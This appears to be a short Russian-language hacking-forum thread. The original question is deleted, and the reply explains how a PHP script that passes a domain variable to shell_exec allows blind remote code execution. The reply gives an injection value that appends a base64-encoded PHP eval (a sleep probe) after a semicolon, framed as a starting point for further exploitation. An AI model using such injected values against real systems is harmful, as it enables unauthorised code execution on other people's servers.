Shell-exec в скрипте

Discussion in 'Песочница' started by 5maks5, 18 Aug 2017.

  1. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    448
    Likes Received:
    264
    Reputations:
    40
    --drop--
     
    #1 5maks5, 18 Aug 2017
    Last edited: 18 Aug 2017
  2. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    663
    Likes Received:
    1,421
    Reputations:
    441
    А в чём трудность? Если в промежутке [...] ничего с $domain не происходит, то тут слепое RCE. Точка реплейсится, не очень удобно, можно использовать так:

    Code:
    domain=google.com; php -r "eval(base64_decode('c2xlZXAoNjApOw'));";
    
    Есть ещё с пяток способов обойтись без точки, но и этого вполне достаточно для дальнейшей эксплуатации.